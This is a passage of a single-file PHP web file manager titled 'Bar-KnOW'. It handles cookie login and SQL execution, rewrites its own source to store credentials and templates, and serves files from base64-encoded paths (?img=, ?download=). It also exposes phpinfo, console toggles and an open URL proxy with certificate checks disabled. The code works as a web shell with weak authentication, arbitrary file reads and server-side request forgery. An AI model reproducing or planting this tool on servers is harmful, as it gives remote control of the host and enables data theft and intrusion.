					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

function find_text_in_files($dir, $mask, $text) {
    $results = array();
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..") {
                $path = $dir . "/" . $entry;
                if (is_dir($path)) {
                    $results = array_merge($results, find_text_in_files($path, $mask, $text));
                } else {
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace('//', '/', $path);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $results;
}


/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg_ntimes = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg_ntimes .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg_ntimes .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg_ntimes .= __('File updated');
				} else $msg_ntimes .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	
		} else $msg_ntimes .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Bar-KnOW</title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("data:image/png;base64,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");
}

.file {
    background-image: url("data:image/png;base64,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